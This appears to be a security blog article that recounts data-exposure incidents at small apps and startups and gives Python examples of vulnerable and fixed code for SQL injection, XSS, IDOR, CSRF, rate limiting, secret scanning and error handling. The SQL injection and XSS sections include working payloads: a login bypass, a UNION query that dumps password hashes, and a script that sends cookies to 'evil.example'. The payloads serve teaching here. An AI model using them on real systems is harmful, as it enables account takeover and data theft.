In the world of tech startups, speed often wins over everything. Teams focus on shipping new features, growing the user base, and impressing investors. Security? It’s often an afterthought—until something goes wrong.
Here are real examples of security incidents involving small web and mobile apps, and how they could’ve been prevented by embedding security practices early on.
Feeld Dating App – Sensitive User Data Exposure (2024)
Feeld, a UK-based dating app for people exploring alternative relationships, faced a serious security incident in 2024. Security researchers found authorization flaws in its API that could have exposed private user data: photos, messages, and sensitive relationship details.
Feeld fixed the issues within two months, but the case shows how little stood between an ordinary account and other users' most personal data.
How this could’ve been avoided:
- Implement proper authorization checks: every request for sensitive content must be checked against the identity in the session, not against identifiers supplied in the request.
- Run regular security audits and a bug bounty or disclosure program: Feeld eventually committed to working with ethical hackers; that should have been in place before the exposure.
Zapier – Code Repository Breach (2025)
Zapier, a well-known automation platform, disclosed in 2025 that an attacker had gained unauthorized access to its internal code repositories. Customer data that had been copied into debugging logs by mistake was potentially exposed. The intrusion was possible because of a misconfiguration of two-factor authentication (2FA) on an employee account.
How this could’ve been avoided:
- Enforce mandatory 2FA on all critical accounts: for source control, CI, cloud consoles and admin panels, 2FA should be enforced centrally by the identity provider rather than left to each user, and audited regularly, since a single unenforced account is enough.
- Keep production data out of repositories and debug logs: development environments and debugging output should never contain real customer data, and log pipelines should redact personal data and credentials before anything is written.
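One way to enforce the second point is to scrub log records before any handler writes them. The following is an added example, not Zapier's code; the three patterns, the logger name `demo.redact` and the sample messages are constructed for illustration and would need extending for a real application:

```python
"""Redact obvious personal data and credentials before log records are written."""
import logging
import re

# Patterns for values that end up in debug output by accident.
# Assumption: these three cover this app's data; extend per application.
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
BEARER = re.compile(r"(?i)(bearer\s+)[A-Za-z0-9._\-]+")
CARD = re.compile(r"\b\d(?:[ -]?\d){12,15}\b")  # 13-16 digits, optional separators


def redact(text: str) -> str:
    """Replace sensitive substrings with fixed placeholders."""
    text = EMAIL.sub("<email>", text)
    text = BEARER.sub(r"\1<token>", text)
    text = CARD.sub("<card>", text)
    return text


class RedactingFilter(logging.Filter):
    """Rewrites the message and its arguments before any handler formats them."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact(str(record.msg))
        if isinstance(record.args, dict):
            record.args = {k: redact(str(v)) for k, v in record.args.items()}
        elif record.args:
            record.args = tuple(redact(str(a)) for a in record.args)
        return True  # never drop the record, only scrub it


def logged_lines(messages):
    """Run constructed debug messages through a logger with the filter attached
    and return the formatted output, so the effect can be checked without a file.
    Each message is a tuple: (format string, *args)."""
    out = []

    class ListHandler(logging.Handler):
        def emit(self, record):
            out.append(self.format(record))

    logger = logging.getLogger("demo.redact")
    logger.handlers.clear()
    logger.filters.clear()
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    logger.addFilter(RedactingFilter())
    handler = ListHandler()
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    for msg, *args in messages:
        logger.debug(msg, *args)
    return out


if __name__ == "__main__":
    # Constructed sample: the kind of line a developer adds while debugging a webhook.
    for line in logged_lines([
        ("webhook for %s failed, retrying", "bob@example.com"),
        ("upstream replied 401 for Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.payload.sig",),
    ]):
        print(line)
```

Attaching the filter to the logger rather than to one handler means every sink (file, stdout, shipping agent) sees the scrubbed record. Redaction is a safety net, not a substitute for not logging the data in the first place.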
Confidant Health – Therapy Session Data Exposure (2024)
A database belonging to Confidant Health, a telehealth startup, was left without authentication and reachable from the internet. The exposure covered over 1.7 million activity logs and sensitive audio and video recordings of therapy sessions.
How this could’ve been avoided:
- Lock down database access: a database reachable from the public internet without authentication is almost always a misconfiguration. Bind it to a private network, require authentication, allow-list only the application hosts that need it, and segment it from everything else.
- Scan infrastructure continuously: automated checks, whether a cloud security posture tool or a simple script, can flag publicly reachable storage buckets and databases as soon as they appear.
MOVEit Software Breach – Massive Supply Chain Attack (2023)
While not a startup itself, the MOVEit Transfer breach affected thousands of organizations, many of them small companies that had adopted third-party software without reviewing its security posture. A SQL injection vulnerability in MOVEit Transfer (CVE-2023-34362) let the Cl0p ransomware group steal files from internet-exposed instances at scale.
How this could’ve been avoided (from a startup’s perspective):
- Assess third-party software risks: Startups should perform due diligence when integrating external platforms and regularly monitor vulnerability disclosures.
- Apply zero-trust principles and isolate critical systems: even trusted third-party services should hold only the minimum data they need, and internet-facing components such as file transfer servers should be segmented from wherever sensitive data lives.
SQL Injection
When user input is concatenated into a database query instead of being passed as a bound parameter, an attacker can change the meaning of the query. This can lead to unauthorized data access, data destruction, or even server compromise. The MOVEit Transfer breach above was a SQL injection flaw, and it cost thousands of organizations their files. (Equifax, often cited here, was an Apache Struts flaw; see Outdated Dependencies below.) Even small apps aren't immune: a local restaurant's ordering system was compromised through SQL injection, leaking customers' credit card information.
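The two lookups below show the bug and the fix side by side. This is an added example, not code from any of the incidents above; the `users` table, its rows and the two payloads are constructed, and SQLite stands in for whatever database the app uses:

```python
"""String-built query vs. parameterised query against an in-memory SQLite database."""
import sqlite3


def make_users_db() -> sqlite3.Connection:
    """Constructed sample table; the rows are illustrative."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "alice@example.com"),
         ("bob", "hash-b", "bob@example.com")],
    )
    return conn


def find_user_vulnerable(conn, username: str):
    # The injection bug: the request value becomes part of the SQL text.
    query = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username: str):
    # Bound parameter: the driver sends the value separately from the statement,
    # so quotes and keywords inside it are just characters to compare against.
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


# Two classic payloads: the first defeats the WHERE clause, the second pulls a
# column the endpoint was never meant to return.
BYPASS = "' OR '1'='1"
UNION_DUMP = "' UNION SELECT username, password_hash FROM users --"

if __name__ == "__main__":
    conn = make_users_db()
    print("vulnerable, bypass:", find_user_vulnerable(conn, BYPASS))
    print("vulnerable, union: ", find_user_vulnerable(conn, UNION_DUMP))
    print("safe, bypass:      ", find_user_safe(conn, BYPASS))
    print("safe, union:       ", find_user_safe(conn, UNION_DUMP))
```

The UNION payload is the one to remember: the vulnerable endpoint returns every password hash as if it were an email address, which is how "a login form" turns into "the whole table". Input sanitising does not fix this class of bug; parameter binding (or an ORM that always binds) does.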
Cross-Site Scripting (XSS)
This occurs when your app renders user-supplied input into a page without encoding it for the context it lands in. Attackers inject JavaScript that then runs in other users' browsers with those users' sessions. In 2014, eBay had an XSS vulnerability that allowed attackers to create legitimate-looking listings containing malicious JavaScript. On a smaller scale, an indie game developer's community forum was compromised when attackers injected scripts into profile descriptions that stole other users' login credentials.
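"Encoding for the context" is the part that is usually missed, so here is the same attacker input rendered into an HTML body, an attribute and a script block. This is an added example, not the eBay or forum code; the `bio`/`display_name` fields and the three payloads are constructed:

```python
"""Contextual output encoding: user-supplied strings rendered into three HTML contexts."""
import html
import json


def render_bio_vulnerable(bio: str) -> str:
    # Raw interpolation: whatever the user typed becomes markup.
    return f"<p class='bio'>{bio}</p>"


def render_bio_safe(bio: str) -> str:
    # HTML body context: escape & < > " and ' so the browser treats the text as text.
    return f"<p class='bio'>{html.escape(bio, quote=True)}</p>"


def render_name_attr_safe(name: str) -> str:
    # Attribute context: always quote the attribute AND escape quotes inside it,
    # otherwise  x" onmouseover="...  breaks out of the value.
    return f'<input name="display_name" value="{html.escape(name, quote=True)}">'


def render_user_json_safe(value) -> str:
    # Script context: HTML escaping is the wrong tool here (it would corrupt the JS).
    # JSON-encode, then escape '<' so a value containing "</script>" cannot
    # terminate the script element early.
    encoded = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var user = {encoded};</script>"


# Constructed attacker inputs, one per context.
BODY_PAYLOAD = "<script>fetch('//evil.example/?c=' + document.cookie)</script>"
ATTR_PAYLOAD = 'x" onmouseover="alert(1)'
SCRIPT_PAYLOAD = {"bio": "</script><script>alert(1)</script>"}

if __name__ == "__main__":
    print(render_bio_vulnerable(BODY_PAYLOAD))
    print(render_bio_safe(BODY_PAYLOAD))
    print(render_name_attr_safe(ATTR_PAYLOAD))
    print(render_user_json_safe(SCRIPT_PAYLOAD))
```

Template engines that auto-escape (Jinja2 with autoescape on, React's JSX) do the body and attribute cases for you; the script case and any `innerHTML`-style sink still need explicit handling, and a Content-Security-Policy header limits the damage when something slips through.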
Broken Authentication
Flaws in login and session handling are extremely common in new applications. The 2018 Panera Bread leak exposed millions of customer records because an API endpoint returned customer data without requiring authentication at all. In another case, a small fitness tracking app had no brute-force protection, allowing attackers to systematically guess passwords and access users' health data and running routes.
Insecure Direct Object References (IDOR)
This happens when your app fetches an object by a user-supplied identifier without checking that the caller is allowed to see that particular object; being logged in is not the same as being authorized. In 2021, a major dating app had an IDOR vulnerability that allowed accessing other users' location data by simply changing ID numbers in API requests. A similar issue affected a portfolio site for photographers where changing the image ID in the URL revealed private commissioned work that wasn't meant to be public.
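The Feeld recommendation earlier ("check against the session identity, not the request") and this section describe the same bug, so one example covers both: a photo lookup keyed only on the id, beside one where the owner is part of the query. This is an added example with a constructed `photos` table and SQLite; it is not code from Feeld or the sites mentioned:

```python
"""IDOR: object lookup keyed only on the request id, beside an owner-scoped lookup."""
import sqlite3


def make_photos_db() -> sqlite3.Connection:
    """Constructed sample data: three photos across two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE photos (id INTEGER PRIMARY KEY, owner TEXT, path TEXT, private INTEGER)"
    )
    conn.executemany(
        "INSERT INTO photos VALUES (?, ?, ?, ?)",
        [
            (101, "alice", "/media/alice/holiday.jpg", 1),
            (102, "bob", "/media/bob/profile.jpg", 0),
            (103, "bob", "/media/bob/verification.jpg", 1),
        ],
    )
    return conn


def get_photo_vulnerable(conn, current_user: str, photo_id: int):
    # Authenticated but not authorised: the caller's identity never reaches the
    # query, so any logged-in user can walk the id space.
    return conn.execute(
        "SELECT owner, path FROM photos WHERE id = ?", (photo_id,)
    ).fetchone()


def get_photo_safe(conn, current_user: str, photo_id: int):
    # Authorisation is part of the predicate: a row comes back only if the caller
    # owns it or it is public. Callers treat None as 404 for both "missing" and
    # "not yours", so the response does not reveal which ids exist.
    return conn.execute(
        "SELECT owner, path FROM photos WHERE id = ? AND (owner = ? OR private = 0)",
        (photo_id, current_user),
    ).fetchone()


def enumerate_ids(conn, handler, current_user: str, id_range) -> list:
    """What an attacker's scan sees: the ids for which the handler returned a record."""
    return [i for i in id_range if handler(conn, current_user, i) is not None]


if __name__ == "__main__":
    conn = make_photos_db()
    print("mallory via vulnerable handler:", enumerate_ids(conn, get_photo_vulnerable, "mallory", range(100, 110)))
    print("mallory via safe handler:      ", enumerate_ids(conn, get_photo_safe, "mallory", range(100, 110)))
```

Sequential integer ids make the scan trivial; random identifiers slow it down but are not a fix, because a leaked or guessed id is still enough once the check is missing. The check has to be in the data access path.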
Cross-Site Request Forgery (CSRF)
These attacks trick a victim's browser into sending a state-changing request to a site where the victim is logged in; the browser attaches the session cookie automatically, so the request looks legitimate to the server. In 2018, cryptocurrency exchange platform Coinbase patched a vulnerability that could have allowed attackers to drain users' accounts through CSRF. A smaller example involved a self-published author's website where an attacker created a malicious page that, when visited by the admin while logged in, changed book prices to $0.
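The price-change handler below layers the standard defences: a session-bound token, an Origin check, POST-only, and a `SameSite` session cookie. This is an added example, not the author-site code; `shop.example`, the request dict shape and the in-memory key are assumptions for illustration:

```python
"""CSRF defences for a state-changing endpoint: session-bound token, origin check,
POST-only, and a SameSite session cookie."""
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Assumption: a real deployment loads this key from configuration, not at import time.
SECRET_KEY = secrets.token_bytes(32)
ALLOWED_ORIGIN = ("https", "shop.example")  # assumed scheme and host of the app itself


def issue_csrf_token(session_id: str) -> str:
    """nonce.HMAC(session_id:nonce). Binding the MAC to the session means a token
    taken from the attacker's own session is worthless against the victim's."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)  # constant-time comparison


def origin_allowed(headers: dict) -> bool:
    # Browsers send Origin on cross-site POSTs; fall back to Referer; reject if neither exists.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    return (parsed.scheme, parsed.netloc) == ALLOWED_ORIGIN


def session_cookie_header(session_id: str) -> str:
    # SameSite=Lax: the browser does not attach the cookie to cross-site POSTs at all.
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def handle_price_update(request: dict, session_id: str) -> int:
    """request is a constructed dict with 'method', 'headers' and 'form' keys.
    Returns the HTTP status the handler would send."""
    if request["method"] != "POST":
        return 405  # state changes never ride on GET, which any <img> tag can trigger
    if not origin_allowed(request["headers"]):
        return 403
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return 403
    # ... apply the price change for session_id's account here ...
    return 200


if __name__ == "__main__":
    sid = "sess-admin"
    legit = {"method": "POST", "headers": {"Origin": "https://shop.example"},
             "form": {"csrf_token": issue_csrf_token(sid), "price": "0"}}
    forged = {"method": "POST", "headers": {"Origin": "https://attacker.example"},
              "form": {"price": "0"}}
    print("legitimate:", handle_price_update(legit, sid))
    print("forged:    ", handle_price_update(forged, sid))
    print(session_cookie_header(sid))
```

Any one of these layers would have stopped the $0 price change; keeping several matters because each has a gap (old browsers without SameSite support, Origin stripped by some proxies, a token accidentally checked only on some routes).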
Missing Rate Limiting
Without limits on how often an action can be performed, attackers can abuse your systems. In 2020, a researcher showed that Zoom's six-digit meeting passcodes could be brute-forced because the web client did not limit attempts; Zoom fixed it by adding rate limiting. A small business's appointment booking system was overwhelmed when a competitor used automated tools to book and immediately cancel hundreds of fake appointments, preventing legitimate customers from scheduling.
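The fitness app under Broken Authentication and this section share one fix, so here is a login guard with two sliding-window limits (per source IP and per account) in front of a constant-time credential check. This is an added example, not code from Zoom or the apps described; the limits, the PBKDF2 parameters and the single test account are assumptions chosen for illustration:

```python
"""Brute-force protection for a login endpoint: sliding-window limits per source IP
and per account, with a constant-time credential check."""
import hashlib
import hmac
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allows at most `limit` events per key within the trailing `window` seconds."""

    def __init__(self, limit: int, window: float, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self.events = defaultdict(deque)

    def allow(self, key: str) -> bool:
        now = self.clock()
        q = self.events[key]
        while q and q[0] <= now - self.window:  # drop events that left the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


# Constructed user store: one account, password hashed with PBKDF2.
# Assumption: salt and iteration count are illustrative; use a per-user salt in practice.
_SALT = b"demo-salt-not-for-production"
USERS = {"alice": hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, 100_000)}


def check_credentials(username: str, password: str) -> bool:
    stored = USERS.get(username)
    # Hash even for unknown users so response time does not reveal which accounts exist.
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)
    return stored is not None and hmac.compare_digest(stored, candidate)


class LoginGuard:
    """Two independent limits: per IP slows credential stuffing across many accounts;
    per account slows a distributed brute force against one user."""

    def __init__(self, clock=time.monotonic):
        self.per_ip = SlidingWindowLimiter(limit=20, window=60, clock=clock)
        self.per_account = SlidingWindowLimiter(limit=5, window=300, clock=clock)

    def attempt(self, ip: str, username: str, password: str) -> str:
        # Quota is consumed before the password is checked, so the limiter cannot be
        # used as an oracle and failed and successful attempts count alike.
        if not self.per_ip.allow(ip):
            return "rate_limited_ip"
        if not self.per_account.allow(username.lower()):
            return "rate_limited_account"
        return "ok" if check_credentials(username, password) else "bad_credentials"


class FakeClock:
    """Controllable clock so the windows can be exercised without sleeping."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t


if __name__ == "__main__":
    clock = FakeClock()
    guard = LoginGuard(clock=clock)
    for i in range(7):
        print(guard.attempt("203.0.113.5", "alice", f"guess{i}"))
    clock.t += 301
    print(guard.attempt("203.0.113.5", "alice", "correct horse"))
```

Per-account limiting is what stops the "guess every password for one user" attack the fitness app suffered; per-IP limiting is what stops the spray across accounts. Production deployments usually add a third dimension (a device cookie or CAPTCHA after a few failures) so a legitimate user who mistypes is slowed, not locked out by an attacker.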
Exposed Secrets and API Keys
In 2024, researchers found over 3 million GitHub repositories leaking API keys and other secrets. The consequences are real: one indie game developer accidentally exposed their AWS keys in a public repository, resulting in cryptocurrency miners being deployed on their account, generating thousands of dollars in unexpected charges in just 24 hours.
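The cheapest defence is a scanner that runs over added lines before a commit leaves the developer's machine. The block below is an added example, not any named tool's code; the patterns, the entropy cut-off and the sample diff are constructed (the AWS id is Amazon's documented example key, the other values are made up):

```python
"""A minimal pre-commit style secret scanner: run it over the added lines of a diff."""
import math
import re
from collections import Counter

# Order matters: specific formats first, generic assignment last; a line reports its first hit.
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("github_token", re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b")),
    ("private_key", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
    ("generic_assignment",
     re.compile(r"(?i)(?:secret|token|password|api[_-]?key)\w*\s*[:=]\s*['\"]([^'\"]{12,})['\"]")),
]
ENTROPY_THRESHOLD = 3.5  # bits per character; assumed cut-off that lets placeholders through


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())


def scan_lines(lines):
    """Return (line_number, pattern_name) for each added line that looks like a secret."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        if not line.startswith("+"):
            continue  # only lines being added; removals are already in history
        for name, pattern in PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            if name == "generic_assignment" and shannon_entropy(m.group(1)) < ENTROPY_THRESHOLD:
                continue  # low-entropy value such as "changeme-please": likely a placeholder
            findings.append((lineno, name))
            break
    return findings


# Constructed diff hunk lines (leading '+' / ' ' as git prints them).
SAMPLE_DIFF = [
    '+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"',
    '+AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"',
    '+DB_PASSWORD = "changeme-please"',
    '+GITHUB_TOKEN = "ghp_0123456789abcdefghijABCDEFGHIJ012345"',
    '+STRIPE_API_KEY = "sk-live-9f8e7d6c5b4a3928171615141312"',
    ' print("hello")',
]

if __name__ == "__main__":
    for lineno, name in scan_lines(SAMPLE_DIFF):
        print(f"line {lineno}: possible {name}")
```

Two caveats a practitioner would add: a scanner only catches what its patterns describe, so it complements, not replaces, keeping secrets in environment variables or a secrets manager; and once a key has reached a public remote it must be rotated, because rewriting history does not recall the copies already fetched.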
Outdated Dependencies
The massive 2017 Equifax breach affected 147 million people and resulted from failing to patch a known remote code execution vulnerability in Apache Struts (CVE-2017-5638) for which a fix had been available for months. On a smaller scale, a local nonprofit's donation page was compromised because it used an outdated version of a payment processing library with a known vulnerability, resulting in donations being redirected to fraudulent accounts.
Improper Error Handling
Detailed error messages (stack traces, database errors, internal hostnames, the record being processed) give attackers a map of your system and can leak customer data directly. The 2019 Capital One breach is often filed under this heading, but its cause was a misconfigured web application firewall that let the attacker reach the cloud metadata service and obtain credentials; it is a lesson in misconfiguration rather than error messages. A small e-commerce site for handmade goods unintentionally leaked customer shipping addresses through detailed error messages when order processing failed.
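The shipping-address leak is the pattern of returning the exception and the record to the browser. Below, the same failing order is handled both ways: the detail goes to the server log under a reference id the customer can quote to support. This is an added example with a constructed order and payment step, not the site's code:

```python
"""Verbose error response vs. generic response with a server-side correlation id."""
import logging
import uuid


class PaymentGatewayError(Exception):
    pass


def charge(order: dict) -> None:
    """Constructed payment step that fails with an internal, detail-rich message."""
    if order["card_last4"] == "0000":
        raise PaymentGatewayError(
            "timeout connecting to pg-internal-03.example:5432 while charging card ending 0000"
        )


def process_order_vulnerable(order: dict):
    try:
        charge(order)
        return 200, "Order placed"
    except Exception as exc:
        # Leaks an internal hostname and the customer's own record straight to the browser.
        return 500, f"Order failed: {exc!r} while processing {order}"


def make_capturing_logger():
    """Logger whose formatted output is collected in a list (stand-in for the real log sink)."""
    records = []

    class ListHandler(logging.Handler):
        def emit(self, record):
            records.append(self.format(record))

    logger = logging.getLogger("demo.orders")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = ListHandler()
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    return logger, records


def process_order_safe(order: dict, logger: logging.Logger):
    try:
        charge(order)
        return 200, "Order placed"
    except Exception:
        ref = uuid.uuid4().hex[:12]
        # Full detail, including the traceback, goes to the server log only, keyed by ref
        # so support can find it without the customer ever seeing internals.
        logger.error("order %s failed ref=%s", order["id"], ref, exc_info=True)
        return 500, f"We could not process your order. Reference: {ref}"


# Constructed order with the kind of data that ends up in a leaked error page.
ORDER = {"id": 4711, "card_last4": "0000", "shipping": "221B Baker Street, London"}

if __name__ == "__main__":
    print(process_order_vulnerable(ORDER))
    logger, records = make_capturing_logger()
    print(process_order_safe(ORDER, logger))
    print(records[0].splitlines()[0])
```

Frameworks usually get this right in production mode and wrong in debug mode; the incident pattern is a debug flag left on, so the deploy checklist should verify it, not just the code.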
Lack of HTTPS
In 2017, all Starbucks user accounts were potentially exposed when their website failed to use HTTPS for login forms. A local music teacher's student portal transmitted lesson recordings and payment information without encryption, allowing a malicious actor on the same coffee shop Wi-Fi to intercept student data and payment details. Serve every page over HTTPS, not just the login form, redirect plain HTTP, and send an HSTS header so browsers refuse to fall back to unencrypted connections.
Remember, you don’t need to be a security expert to avoid these issues. Using modern frameworks with built-in protections, keeping dependencies updated, and following basic security practices will help keep your creative projects safe from the most common attacks.